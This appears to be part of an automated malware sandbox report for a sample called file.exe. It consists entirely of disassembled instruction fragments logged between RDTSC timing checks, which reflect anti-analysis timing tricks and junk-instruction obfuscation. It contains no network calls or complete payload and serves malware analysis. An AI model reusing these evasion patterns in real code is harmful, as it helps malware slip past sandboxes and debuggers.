                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C7CBA6 second address: C7CBAC instructions: 0x00000000 rdtsc; 0x00000002 pop edx; 0x00000003 pop eax; 0x00000004 pop edx; 0x00000005 pop eax; 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C7CBAC second address: C7CBB2 instructions: 0x00000000 rdtsc; 0x00000002 push eax; 0x00000003 push edx; 0x00000004 pushad; 0x00000005 popad; 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C7CC5F second address: C7CC65 instructions: 0x00000000 rdtsc; 0x00000002 pop edx; 0x00000003 pop eax; 0x00000004 push eax; 0x00000005 push edx; 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7CC65 second address: C7CCCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007F6074F511F8h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007F6074F511F8h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 00000018h 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b call 00007F6074F511FDh 0x00000030 mov cx, ax 0x00000033 pop edx 0x00000034 jmp 00007F6074F511FBh 0x00000039 push 00000000h 0x0000003b js 00007F6074F511FBh 0x00000041 adc di, CA22h 0x00000046 push E92BBBB9h 0x0000004b push esi 0x0000004c pushad 0x0000004d push esi 0x0000004e pop esi 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7CCCA second address: C7CD40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 add dword ptr [esp], 16D444C7h 0x0000000d or dword ptr [ebp+122D1C92h], ecx 0x00000013 push 00000003h 0x00000015 push 00000000h 0x00000017 push esi 0x00000018 call 00007F6074D9F9E8h 0x0000001d pop esi 0x0000001e mov dword ptr [esp+04h], esi 0x00000022 add dword ptr [esp+04h], 00000018h 0x0000002a inc esi 0x0000002b push esi 0x0000002c ret 0x0000002d pop esi 0x0000002e ret 0x0000002f mov dword ptr [ebp+122D1AF1h], ebx 0x00000035 push 00000000h 0x00000037 mov esi, dword ptr [ebp+122D2A50h] 0x0000003d push 00000003h 0x0000003f clc 0x00000040 push A5FCD912h 0x00000045 pushad 0x00000046 jmp 00007F6074D9F9F4h 0x0000004b pushad 0x0000004c jmp 00007F6074D9F9F3h 0x00000051 push eax 0x00000052 push edx 0x00000053 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7CD40 second address: C7CD6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 add dword ptr [esp], 1A0326EEh 0x0000000d and cl, FFFFFFE1h 0x00000010 lea ebx, dword ptr [ebp+12452AB0h] 0x00000016 push eax 0x00000017 pushad 0x00000018 pushad 0x00000019 jmp 00007F6074F511FBh 0x0000001e js 00007F6074F511F6h 0x00000024 popad 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7CD6E second address: C7CD74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7CE3C second address: C7CE81 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6074F511F8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push edx 0x0000000f pushad 0x00000010 jno 00007F6074F511F6h 0x00000016 jmp 00007F6074F511FAh 0x0000001b popad 0x0000001c pop edx 0x0000001d mov eax, dword ptr [eax] 0x0000001f push eax 0x00000020 pushad 0x00000021 jmp 00007F6074F51200h 0x00000026 pushad 0x00000027 popad 0x00000028 popad 0x00000029 pop eax 0x0000002a mov dword ptr [esp+04h], eax 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7CE81 second address: C7CE85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7CE85 second address: C7CE8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7CE8F second address: C7CE93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7D078 second address: C7D07D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7D07D second address: C7D083 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7D083 second address: C7D087 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9B84E second address: C9B859 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F6074D9F9E6h 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9B859 second address: C9B8BC instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F6074F511FAh 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jmp 00007F6074F51208h 0x00000010 jmp 00007F6074F51209h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a js 00007F6074F51243h 0x00000020 jmp 00007F6074F51204h 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9B8BC second address: C9B8D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6074D9F9F1h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9BA37 second address: C9BA3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9BA3D second address: C9BA43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9BB91 second address: C9BBB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6074F511FAh 0x00000009 jnp 00007F6074F511F6h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 pop eax 0x00000014 jbe 00007F6074F511F6h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9BF8B second address: C9BFA4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F6074D9F9F3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9C0E1 second address: C9C0EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9C0EC second address: C9C0F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9C38E second address: C9C398 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F6074F511F6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9C398 second address: C9C3B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F6074D9F9E6h 0x0000000a jmp 00007F6074D9F9EFh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9C4ED second address: C9C506 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6074F51205h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9C506 second address: C9C511 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnp 00007F6074D9F9E6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C93211 second address: C9322A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnl 00007F6074F511F6h 0x0000000c popad 0x0000000d jo 00007F6074F511FCh 0x00000013 je 00007F6074F511F6h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C70803 second address: C70807 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C70807 second address: C7080D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9CD56 second address: C9CD64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9CEA4 second address: C9CED4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6074F51200h 0x00000009 popad 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 jmp 00007F6074F511FAh 0x00000015 push edx 0x00000016 pop edx 0x00000017 popad 0x00000018 jp 00007F6074F511F8h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9D002 second address: C9D006 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9D197 second address: C9D1AB instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F6074F511FEh 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9D47C second address: C9D480 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA03BF second address: CA03C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA03C5 second address: CA03D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 ja 00007F6074D9F9E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA03D1 second address: CA03DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F6074F511F6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C75901 second address: C75907 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C75907 second address: C7590B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7590B second address: C7590F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7590F second address: C75915 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C75915 second address: C75925 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F6074D9F9EAh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C75925 second address: C7592E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7592E second address: C75934 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA6859 second address: CA6885 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push esi 0x0000000b jmp 00007F6074F51200h 0x00000010 pop esi 0x00000011 mov eax, dword ptr [eax] 0x00000013 pushad 0x00000014 push edx 0x00000015 jnp 00007F6074F511F6h 0x0000001b pop edx 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAA709 second address: CAA711 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAA711 second address: CAA719 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAA719 second address: CAA71E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAA71E second address: CAA72B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F6074F511F6h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAA88E second address: CAA893 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAA893 second address: CAA8A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6074F511FBh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAA8A4 second address: CAA8A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAACC7 second address: CAACD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F6074F511F6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAACD1 second address: CAAD00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F6074D9F9F7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F6074D9F9F2h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAAD00 second address: CAAD29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6074F51207h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jmp 00007F6074F511FBh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CABE56 second address: CABE78 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F6074D9F9F5h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CABE78 second address: CABE86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6074F511FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAC4A9 second address: CAC4E5 instructions: 0x00000000 rdtsc 0x00000002 js 00007F6074D9F9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F6074D9F9EDh 0x0000000f popad 0x00000010 xchg eax, ebx 0x00000011 push eax 0x00000012 mov dword ptr [ebp+122D1A56h], ebx 0x00000018 pop edi 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F6074D9F9F8h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAC64A second address: CAC64E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAC64E second address: CAC658 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CACA1B second address: CACA25 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F6074F511F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAD9CF second address: CAD9D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAD7ED second address: CAD7F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAD9D4 second address: CAD9DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB13F8 second address: CB1404 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F6074F511FCh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB1404 second address: CB140F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAF201 second address: CAF20B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F6074F511F6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAF20B second address: CAF218 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB2959 second address: CB295D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB31B3 second address: CB31B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB31B8 second address: CB31C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F6074F511F6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB31C2 second address: CB31C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB3CEF second address: CB3CF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB3CF5 second address: CB3CF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB3CF9 second address: CB3D0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push esi 0x0000000e pop esi 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB7942 second address: CB794B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB8809 second address: CB8816 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pushad 0x0000000b popad 0x0000000c pop esi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBB966 second address: CBB9E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6074D9F9F8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jmp 00007F6074D9F9EDh 0x00000013 nop 0x00000014 push eax 0x00000015 jmp 00007F6074D9F9EAh 0x0000001a pop edi 0x0000001b pushad 0x0000001c mov si, di 0x0000001f mov di, bx 0x00000022 popad 0x00000023 push 00000000h 0x00000025 mov di, bx 0x00000028 jg 00007F6074D9F9F2h 0x0000002e push 00000000h 0x00000030 mov dword ptr [ebp+122D1BFBh], edi 0x00000036 push eax 0x00000037 push eax 0x00000038 push edx 0x00000039 push esi 0x0000003a jmp 00007F6074D9F9F5h 0x0000003f pop esi 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBAB60 second address: CBAB64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBB9E2 second address: CBB9E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBAB64 second address: CBAB79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F6074F511F8h 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBB9E7 second address: CBB9ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBBB11 second address: CBBB1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F6074F511F6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBBB1B second address: CBBB1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBBB1F second address: CBBBD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007F6074F511F8h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 0000001Ah 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 mov bx, 59B2h 0x00000029 push dword ptr fs:[00000000h] 0x00000030 je 00007F6074F51201h 0x00000036 jmp 00007F6074F511FBh 0x0000003b mov dword ptr fs:[00000000h], esp 0x00000042 push 00000000h 0x00000044 push ebx 0x00000045 call 00007F6074F511F8h 0x0000004a pop ebx 0x0000004b mov dword ptr [esp+04h], ebx 0x0000004f add dword ptr [esp+04h], 0000001Ah 0x00000057 inc ebx 0x00000058 push ebx 0x00000059 ret 0x0000005a pop ebx 0x0000005b ret 0x0000005c jmp 00007F6074F51209h 0x00000061 mov eax, dword ptr [ebp+122D0A59h] 0x00000067 mov ebx, dword ptr [ebp+124756A7h] 0x0000006d mov edi, esi 0x0000006f push FFFFFFFFh 0x00000071 push ebx 0x00000072 mov edi, esi 0x00000074 pop edi 0x00000075 sub dword ptr [ebp+122D1C5Bh], ecx 0x0000007b nop 0x0000007c push eax 0x0000007d push edx 0x0000007e jmp 00007F6074F511FEh 0x00000083 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBBBD5 second address: CBBBF4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6074D9F9F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBEA4A second address: CBEA50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBEA50 second address: CBEA54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
